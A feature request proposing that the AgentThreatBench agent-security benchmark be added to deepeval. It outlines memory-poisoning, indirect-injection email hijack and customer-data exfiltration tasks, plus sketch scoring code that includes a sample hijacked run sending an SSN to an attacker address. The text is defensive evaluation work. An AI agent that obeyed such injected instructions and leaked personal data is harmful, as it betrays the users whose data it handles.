Feature request: Add AgentThreatBench (OWASP Agentic Top 10) as a built-in security benchmark

## Summary

[AgentThreatBench](https://ukgovernmentbeis.github.io/inspect_evals/evals/safeguards/agent_threat_bench/) is, to my knowledge, the first benchmark suite that operationalizes the **OWASP Top 10 for Agentic Applications (2026)** into executable evaluation tasks. It was merged into UKGovernmentBEIS/inspect_evals in [PR #1037](https://github.com/UKGovernmentBEIS/inspect_evals/pull/1037). inspect_evals is the community evaluation repository for Inspect, created by the UK AI Security Institute (formerly the AI Safety Institute) in collaboration with Arcadia Impact and the Vector Institute.

## What it benchmarks

Three tasks targeting distinct agentic attack surfaces:

- **Memory Poison (ASI06):** Tests whether agents still answer questions correctly from a memory store that contains adversarial entries (direct injection, context poisoning, gradual poisoning, authority impersonation, delimiter escape, role hijack).
- **Autonomy Hijack (ASI01):** Tests whether agents performing email triage resist indirect instruction injection embedded in email content returned by tools.
- **Data Exfiltration (ASI01):** Tests whether a customer-support agent can be redirected, via indirect injection in `lookup_customer` output, into leaking SSNs or account numbers through `send_message`.
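
To make the Data Exfiltration check concrete, here is a minimal sketch of how a security verdict could be derived from a recorded run. It is not the benchmark's actual scorer: the `ToolCall` structure, the `leaked_values` helper, and the sample values are all hypothetical, and only the tool names `lookup_customer` and `send_message` come from the task description above.

```python
from dataclasses import dataclass, field


@dataclass
class ToolCall:
    """One tool invocation recorded from an agent run (hypothetical structure)."""
    name: str
    arguments: dict = field(default_factory=dict)


def leaked_values(calls, secrets):
    """Return the secrets that appear in the arguments of any send_message call."""
    leaked = set()
    for call in calls:
        if call.name != "send_message":
            continue  # only outbound messages can exfiltrate data in this sketch
        payload = " ".join(str(value) for value in call.arguments.values())
        leaked.update(secret for secret in secrets if secret in payload)
    return leaked


# Illustrative values only; not taken from the benchmark dataset.
secrets = {"123-45-6789", "ACCT-0042"}

safe_run = [
    ToolCall("lookup_customer", {"customer_id": "c1"}),
    ToolCall("send_message", {"to": "c1", "body": "Your ticket is resolved."}),
]
hijacked_run = [
    ToolCall("lookup_customer", {"customer_id": "c1"}),
    ToolCall("send_message", {"to": "attacker@example.com", "body": "SSN 123-45-6789"}),
]

# A run counts as secure when nothing sensitive left through send_message.
safe_is_secure = not leaked_values(safe_run, secrets)
hijacked_is_secure = not leaked_values(hijacked_run, secrets)
```

A substring match is the simplest possible detector. A real scorer would likely also need to handle reformatted or partially redacted values.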

## Scoring approach

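The benchmark uses a **dual-metric** approach: each sample is scored independently for **utility** (did the agent complete the legitimate task?) and **security** (did it resist the attack?). Keeping the two scores separate shows when an agent is secure only because it refuses to do useful work, or useful only because it follows every instruction. This maps well to deepeval's metric architecture, where each metric reports its own score.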
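
As a rough illustration of why the two metrics are reported separately, the sketch below aggregates per-sample results into independent utility and security rates. The `SampleResult` type, the `summarize` function, and the numbers are assumptions made for this example. They are not part of AgentThreatBench or deepeval.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class SampleResult:
    """Per-sample outcome (hypothetical): 1.0 means success, 0.0 means failure."""
    utility: float   # did the agent complete the legitimate task?
    security: float  # did the agent resist the injected attack?


def summarize(results):
    """Average utility and security separately; the two are never blended."""
    if not results:
        raise ValueError("no results to summarize")
    n = len(results)
    return {
        "utility": sum(r.utility for r in results) / n,
        "security": sum(r.security for r in results) / n,
    }


# Illustrative outcomes: two samples complete the task but fall for the attack.
results = [
    SampleResult(utility=1.0, security=1.0),
    SampleResult(utility=1.0, security=0.0),
    SampleResult(utility=1.0, security=0.0),
    SampleResult(utility=0.0, security=1.0),
]
summary = summarize(results)
print(summary)
```

Here the agent finishes 75% of tasks but resists only 50% of attacks, a gap that a single combined score would hide.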

## Proposal

Add AgentThreatBench as a built-in security benchmark in deepeval, similar to how deepeval already supports custom red-team metrics. The dataset is open-source.

**Benchmark docs:** https://ukgovernmentbeis.github.io/inspect_evals/evals/safeguards/agent_threat_bench/
**Source:** https://github.com/UKGovernmentBEIS/inspect_evals/tree/main/src/inspect_evals/agent_threat_bench
**OWASP reference:** https://genai.owasp.org/resource/owasp-top-10-for-agentic-applications-for-2026/

